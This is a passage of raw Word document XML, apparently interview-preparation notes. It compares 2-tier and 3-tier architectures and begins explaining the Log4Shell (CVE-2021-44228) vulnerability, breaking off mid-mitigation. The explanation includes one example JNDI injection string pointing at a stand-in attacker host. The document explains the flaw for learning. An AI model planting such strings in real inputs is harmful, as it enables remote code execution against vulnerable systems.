          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A desktop application connecting directly to a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103377ED"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Diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C7CC4"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lient (UI + Logic) &lt;--&gt; Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B317D"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ros</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC64A6C"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impler to build and deploy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21EC0C"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Faster for small applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6967E4"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C3865F"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Poor scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06BDC2"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ight coupling between client and database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA8DC0"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ecurity concerns due to direct DB access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780CC328" w14:textId="77777777" w:rsidR="00B328B3"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F8A7AEC">
          <v:rect id="_x0000_i3640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7CF84" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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3-Tier Architecture (Presentation–Logic–Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0C9B3"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tructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6D48F"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resentation Layer (Client/UI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA54797"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Business Logic Layer (Application Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB85D4D"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Data Layer (Database Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE006C0"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Web app with Angular (UI) → Spring Boot (API) → PostgreSQL (DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FBAEE"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Diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C632BBC"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lient (UI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539174A8"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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⇅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E353510"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pplication Server (Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A416D19"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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⇅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B031A18"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Database Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CE588"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ros</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE71F0"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Better scalability and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F5F4BB"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Layer separation enables easier upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA7D08"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More secure (no direct DB access from UI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B603D"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387F72E"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lightly more complex to set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62224C4B"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Requires good coordination between layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5B602" w14:textId="77777777" w:rsidR="00B328B3"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9AA093">
          <v:rect id="_x0000_i3641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B43F9F" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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Comparis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4"/>
        <w:gridCol w:w="1359"/>
        <w:gridCol w:w="2312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="613F19B9" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32F988E2" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0522F0" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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2-Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="221A2D0D" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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3-Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="4FB9FCF5" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CCAAB6B"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Layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161F0037"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lient + Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E57F760"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UI + Logic + DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="542D0FEE" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2A301A"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Business Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46841AE7"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lient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5508F85E"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pplication Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6C07CC5C" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FC8F8DF"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Direct DB Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0073EE"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="786C4108"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="4F193A34" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0237DA64"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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C1D046"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5FCBC6"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="2B2A1781" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15DABD7A"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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03A3A9F8"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Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BC4EDC"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Better</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5747AAD3" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08D47194"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Maintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5915F9B4"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Harder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B195E69" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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Easier (decoupled layers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F5AF4C2" w14:textId="14F59AD2" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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38AE6215">
          <v:rect id="_x0000_i3642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22D5BE" w14:textId="1BE0E510" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="007C281D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="902" w:name="_Toc196308382"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Have you heard about the log4j vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="902"/>
    </w:p>
    <w:p w14:paraId="55595D49" w14:textId="4653B94C" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Yes, I'm familiar with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4j vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which was a significant security flaw discovered in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging library (specifically version 2.0 to 2.14.1). Here's an overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C9202" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Log4j Vulnerability (CVE-2021-44228) - "Log4Shell"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A446C"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Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The vulnerability, called </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allows attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>execute arbitrary code remotely</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by exploiting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JNDI (Java Naming and Directory Interface) lookup feature</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Log4j 2.x versions. This occurs when user-controlled input (such as a string) is logged in a way that allows the attacker to trigger a lookup and execute malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFBA13"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How it Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149258C0" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Log4j 2.x versions allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>string-based logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and have a feature that supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>variable substitution</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in log messages using ${}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D637C2A" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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ttackers can inject a specially crafted string containing JNDI lookups, such as ${jndi:ldap://attacker.com/a}, where the JNDI lookup would fetch malicious payloads from an external server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F3CDB" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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If the logging mechanism handles this input unsanitized, it can cause </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remote code execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, potentially allowing attackers to control the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEA974"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everity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E77F69" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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This vulnerability was classified as </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVSS score of 10), as it is relatively easy to exploit and can allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remote code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the affected system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FC8CB" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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It was highly impactful because Log4j is widely used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across many industries, from enterprise applications to open-source projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196F214" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Mitigation and Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1DD68"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Upgrading Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C27A73C" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
